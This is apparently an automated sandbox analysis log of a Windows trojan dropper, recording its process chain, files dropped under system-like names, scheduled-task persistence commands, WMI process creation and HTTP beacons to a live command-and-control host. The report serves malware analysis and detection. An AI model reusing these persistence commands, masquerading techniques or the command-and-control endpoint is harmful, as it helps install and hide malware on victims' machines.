Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362379963.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0702220.xsph.ru/
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0702220.xsph.ru8
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362800777.00000000030FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0702220.xsph.rux
Source: MrsUvRPGeImAhc.exe, 00000010.00000002.325485482.0000000001020000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: chainsavesref.exe, 00000006.00000002.296875095.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp.sprinthost.ru
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://index.from.sh/pages/game.html

Source: unknown

DNS traffic detected: queries for: a0702220.xsph.ru

Source: global traffic	HTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ru

Source: cDouNOFXle.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\comproviderRuntimecommon\chainsavesref.exe

File created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe

Jump to behavior

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006857B	0_2_0006857B
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0008D00E	0_2_0008D00E
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006407E	0_2_0006407E
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_000770BF	0_2_000770BF
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00091194	0_2_00091194
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00063281	0_2_00063281
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006E2A0	0_2_0006E2A0
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_000802F6	0_2_000802F6
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00076646	0_2_00076646
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0008070E	0_2_0008070E
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0008473A	0_2_0008473A
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_000737C1	0_2_000737C1
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_000627E8	0_2_000627E8
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006E8A0	0_2_0006E8A0
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00084969	0_2_00084969
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006F968	0_2_0006F968
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00073A3C	0_2_00073A3C
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00076A7B	0_2_00076A7B
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00080B43	0_2_00080B43
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0008CB60	0_2_0008CB60
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00075C77	0_2_00075C77
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006ED14	0_2_0006ED14
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00073D6D	0_2_00073D6D
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007FDFA	0_2_0007FDFA
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006BE13	0_2_0006BE13
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006DE6C	0_2_0006DE6C
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00065F3C	0_2_00065F3C
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_00080F78	0_2_00080F78

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: String function: 0007ED00 appears 31 times
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: String function: 0007E360 appears 52 times
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: String function: 0007E28C appears 35 times

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_0006718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_0006718C

Source: cDouNOFXle.exe, 00000000.00000003.235684015.00000000054CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
Source: cDouNOFXle.exe, 00000000.00000003.236067464.00000000054FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
Source: cDouNOFXle.exe, 00000000.00000003.236847427.00000000054F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
Source: cDouNOFXle.exe	Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe

Source: cDouNOFXle.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: cDouNOFXle.exe	Virustotal: Detection: 53%
Source: cDouNOFXle.exe	Metadefender: Detection: 40%
Source: cDouNOFXle.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\cDouNOFXle.exe

File read: C:\Users\user\Desktop\cDouNOFXle.exe

Jump to behavior

Source: cDouNOFXle.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cDouNOFXle.exe "C:\Users\user\Desktop\cDouNOFXle.exe"
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f
Source: unknown	Process created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe	Jump to behavior
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\comproviderRuntimecommon\chainsavesref.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainsavesref.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@34/22@1/1

Source: C:\Users\user\Desktop\cDouNOFXle.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_00066EC9 GetLastError,FormatMessageW,

0_2_00066EC9

Source: cDouNOFXle.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Recovery\explorer.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Recovery\explorer.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_01
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\a662db5313495af89c12e9daf05e137fcad6fcec

Source: C:\Users\user\Desktop\cDouNOFXle.exe

Code function: 0_2_00079E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00079E1C

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Command line argument: sfxname	0_2_0007D5D4
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Command line argument: sfxstime	0_2_0007D5D4
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Command line argument: STARTDLG	0_2_0007D5D4

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "

Source: unknown	Process created: C:\Recovery\explorer.exe
Source: unknown	Process created: C:\Recovery\explorer.exe

Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: cDouNOFXle.exe

Static file information: File size 1232540 > 1048576

Source: cDouNOFXle.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cDouNOFXle.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cDouNOFXle.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cDouNOFXle.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cDouNOFXle.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cDouNOFXle.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: cDouNOFXle.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: cDouNOFXle.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cDouNOFXle.exe

Source: cDouNOFXle.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cDouNOFXle.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cDouNOFXle.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cDouNOFXle.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cDouNOFXle.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007E28C push eax; ret		0_2_0007E2AA
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007ED46 push ecx; ret		0_2_0007ED59

Source: cDouNOFXle.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\cDouNOFXle.exe

File created: C:\comproviderRuntimecommon\__tmp_rar_sfx_access_check_4065750

Jump to behavior

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\comproviderRuntimecommon\chainsavesref.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown	Executable created and started: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
Source: unknown	Executable created and started: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe

Drops PE files with benign system names

Source: C:\comproviderRuntimecommon\chainsavesref.exe

File created: C:\Recovery\explorer.exe

Jump to dropped file

Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Recovery\conhost.exe	Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\comproviderRuntimecommon\RuntimeBroker.exe	Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\comproviderRuntimecommon\backgroundTaskHost.exe	Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Recovery\winlogon.exe	Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Recovery\ShellExperienceHost.exe	Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Recovery\explorer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\cDouNOFXle.exe	File created: C:\comproviderRuntimecommon\chainsavesref.exe	Jump to dropped file

Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe			Jump to dropped file
Source: C:\comproviderRuntimecommon\chainsavesref.exe	File created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f

